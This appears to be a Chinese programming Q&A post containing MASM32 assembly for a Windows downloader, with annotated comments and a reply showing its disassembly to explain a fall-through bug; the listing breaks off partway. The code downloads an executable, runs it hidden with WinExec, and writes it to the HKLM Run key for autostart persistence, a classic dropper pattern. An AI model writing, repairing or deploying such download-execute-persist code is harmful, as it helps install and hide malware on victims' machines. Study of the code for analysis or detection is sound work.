.386
.model flat, stdcall
option casemap :none
include \masm32\include\windows.inc
include \masm32\include\kernel32.inc
include \masm32\include\urlmon.inc
include \masm32\include\shell32.inc
include \masm32\include\advapi32.inc
includelib \masm32\lib\kernel32.lib
includelib \masm32\lib\urlmon.lib
includelib \masm32\lib\shell32.lib
includelib \masm32\lib\advapi32.lib
.data
; All configuration of this downloader is plain ASCII in .data: the download
; source, the on-disk drop path and the Run-key value name. They are therefore
; directly recoverable from the binary (the disassembly below annotates them as
; ASCII strings). Every string ends with a space before its NUL, so the exact
; registry key and value names carry that trailing space as well.
URL db "http://127.0.0.1/xxx.exe ",0                                     ; source passed to URLDownloadToFile
EXE db "d:\xxx.exe ",0; drop path: download target, WinExec command line, and Run-key value data
szRegKey db "SOFTWARE\Microsoft\Windows\CurrentVersion\Run ",0           ; HKLM autostart key (persistence); note the name is "Run " with a trailing space
szRegValue db "DownLoader ",0                                            ; value name written under that key
.code
; Entry point: straight-line download-and-execute. Neither API result is
; checked. Because _EnumKey is declared immediately after the WinExec invoke,
; control falls from that call straight into the proc's prologue (the
; disassembly below shows push ebp at 00401021 right after the call at
; 0040101C).
start:
invoke URLDownloadToFile,NULL,addr URL,addr EXE,0,0;  HRESULT in eax is ignored
invoke WinExec,addr EXE,0;  nCmdShow = 0 (SW_HIDE); return value ignored
;-----------------------------------------------------------------------
; _EnumKey(_lpKey)   stdcall, one dword argument that the body never reads
; Persistence step: opens/creates HKLM\<szRegKey> and stores EXE as a
; REG_SZ value named szRegValue, then closes the handle. Only the
; RegCreateKey result is tested; RegSetValueEx's result is not.
; The proc sits inline between the WinExec invoke above and the
; invoke _EnumKey below, so its first instruction is also reached by
; fall-through from start, not only by the explicit invoke.
;-----------------------------------------------------------------------
_EnumKey proc _lpKey
local @hKey,@dwIndex,@dwLastTime:FILETIME   ; @dwIndex and @dwLastTime are declared but never used
invoke RegCreateKey,HKEY_LOCAL_MACHINE,offset szRegKey,addr @hKey   ; creates the key if it does not exist
.if eax == ERROR_SUCCESS
invoke RegSetValueEx,@hKey,addr szRegValue,NULL,\
REG_SZ,addr EXE,10 ; write a REG_SZ-typed value; cbData is a hard-coded 10 (BufSize = A in the disassembly)
invoke RegCloseKey,@hKey
.endif
ret
_EnumKey endp
; Intended call site for _EnumKey. The proc body directly above is already on
; the fall-through path from start (see the disassembly below), so whether
; control ever reaches this line depends on what that first, fall-through
; execution of its ret pops -- not verifiable from the excerpt shown.
invoke _EnumKey,NULL;  the argument is ignored by the proc
invoke ExitProcess,NULL;
end start
------解决方案--------------------------------------------------------
我把你的反汇编代码贴出来,你或许就清楚了。
00401000 > /$ 6A 00 push 0
00401002 |. 6A 00 push 0
00401004 |. 68 19304000 push 00403019 ; ASCII "d:\xxx.exe "
00401009 |. 68 00304000 push 00403000 ; ASCII "http://127.0.0.1/xxx.exe "
0040100E |. 6A 00 push 0
00401010 |. E8 67000000 call <jmp.&urlmon.URLDownloadToFileA>
00401015 |. 6A 00 push 0 ; /ShowState = SW_HIDE
00401017 |. 68 19304000 push 00403019 ; |CmdLine = "d:\xxx.exe "
0040101C |. E8 55000000 call <jmp.&kernel32.WinExec> ; \WinExec
00401021 |$ 55 push ebp
00401022 |. 8BEC mov ebp, esp
00401024 |. 83C4 F0 add esp, -10
00401027 |. 8D45 FC lea eax, [ebp-4]
0040102A |. 50 push eax ; /pHandle
0040102B |. 68 24304000 push 00403024 ; |Subkey = "SOFTWARE\Microsoft\Windows\CurrentVersion\Run "
00401030 |. 68 02000080 push 80000002 ; |hKey = HKEY_LOCAL_MACHINE
00401035 |. E8 4E000000 call <jmp.&advapi32.RegCreateKeyA> ; \RegCreateKeyA
0040103A |. 0BC0 or eax, eax
0040103C |. 75 20 jnz short 0040105E
0040103E |. 6A 0A push 0A ; /BufSize = A (10.)